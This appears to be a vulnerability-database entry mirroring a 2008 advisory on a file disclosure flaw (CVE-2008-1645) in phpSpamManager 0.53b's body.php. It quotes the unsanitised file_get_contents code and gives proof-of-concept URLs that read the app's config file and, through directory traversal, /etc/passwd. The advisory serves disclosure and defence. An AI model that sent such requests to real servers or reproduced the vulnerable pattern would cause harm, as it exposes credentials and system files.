Lucene search
+L

PHPSpamManager 0.53b - 'body.php' Remote File Disclosure

🗓️ 31 Mar 2008 00:00:00Reported by GoLd_MType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 29 Views

phpSpamManager 0.53 beta Remote File Disclosure Vulnerability from 'body.php' fil

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2008-1645
31 Mar 200800:00
circl
CVE
CVE-2008-1645
2 Apr 200817:00
cve
Cvelist
CVE-2008-1645
2 Apr 200817:00
cvelist
EUVD
EUVD-2008-1646
7 Oct 202500:30
euvd
NVD
CVE-2008-1645
2 Apr 200817:44
nvd
Prion
Directory traversal
2 Apr 200817:44
prion
phpSpamManager 0.53 beta (body.php) Remote File Disclosure Vulnerability
D.Script : http://sourceforge.net/project/showfiles.php?group_id=141000
Vuln Code
Ln 38 -> 47 :
//get filename
     $okprint=false;
     $filename = $_REQUEST['filename']; <--- XxX
     if ($filename!='FILENAME')
     {
      debug_print("analysing " .$filename);
      //replace # by dots if necessary
      $filename = preg_replace("/#/",".",$filename);
$mailtext=file_get_contents($filename); <--- XxX
	 $email=new parseMail($mailtext); <--- XxX
POC :
/phpspammanager.0.53.dev/body.php?filename=include/config.inc.php
/phpspammanager.0.53.dev/body.php?filename=../../../../../../../../etc/passwd
                     I'm Mahmood_ali --- I'm Tryagi

# milw0rm.com [2008-03-31]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Nov 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.02286
29